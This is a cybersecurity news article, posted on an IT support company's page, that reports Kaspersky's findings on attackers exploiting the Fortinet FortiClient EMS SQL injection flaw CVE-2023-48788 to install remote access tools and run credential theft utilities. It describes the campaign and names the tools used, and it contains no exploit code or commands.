Now Hiring: Are you a driven and motivated 1st Line IT Support Engineer?

 

Call Anytime 24/7

 
Mail Us For Support
 
Office Address

Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

  • Home
  • cyber security
  • Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

A now-patched critical security flaw impacting Fortinet FortiClient EMS is being exploited by malicious actors as part of a cyber campaign that installed remote desktop software such as AnyDesk and ScreenConnect.

Vulnerability Details: The vulnerability in question is CVE-2023-48788 (CVSS score: 9.3), an SQL injection bug that allows attackers to execute unauthorized code or commands by sending specially crafted data packets.

Incident Overview: Russian cybersecurity firm Kaspersky reported that the October 2024 attack targeted an unnamed company’s Windows server that was exposed to the internet with two open ports associated with FortiClient EMS. “The targeted company employs this technology to allow employees to download specific policies to their corporate devices, granting them secure access to the Fortinet VPN,” the analysis stated.

Attack Progression: Further analysis revealed that the threat actors exploited CVE-2023-48788 as an initial access vector, subsequently deploying a ScreenConnect executable for remote access to the compromised host. “After the initial installation, the attackers began to upload additional payloads to the compromised system, starting discovery and lateral movement activities, such as enumerating network resources, trying to obtain credentials, performing defense evasion techniques, and generating further persistence via the AnyDesk remote control tool,” Kaspersky explained.

Tools Used in the Attack

• webbrowserpassview.exe: A password recovery tool that reveals passwords stored in Internet Explorer (version 4.0 – 11.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.
• Mimikatz: A well-known tool for post-exploitation.
• netpass64.exe: A password recovery tool.
• netscan.exe: A network scanner.

Geographic Impact: The threat actors behind the campaign targeted various companies across Brazil, Croatia, France, India, Indonesia, Mongolia, Namibia, Peru, Spain, Switzerland, Turkey, and the U.A.E., using different ScreenConnect subdomains (e.g., infinity.screenconnect[.]com).

Continued Exploitation: Kaspersky detected further attempts to weaponize CVE-2023-48788 on October 23, 2024, to execute a PowerShell script hosted on a webhook[.]site domain for collecting responses from vulnerable targets during a system scan susceptible to the flaw.

Previous Similar Incidents: The disclosure follows more than eight months after cybersecurity company Forescout uncovered a similar campaign involving the exploitation of CVE-2023-48788 to deliver ScreenConnect and Metasploit Powerfun payloads. “The analysis of this incident helped us to establish that the techniques currently used by the attackers to deploy remote access tools are constantly being updated and growing in complexity,” the researchers noted.

Leave A Comment

Your email address will not be published. Required fields are marked *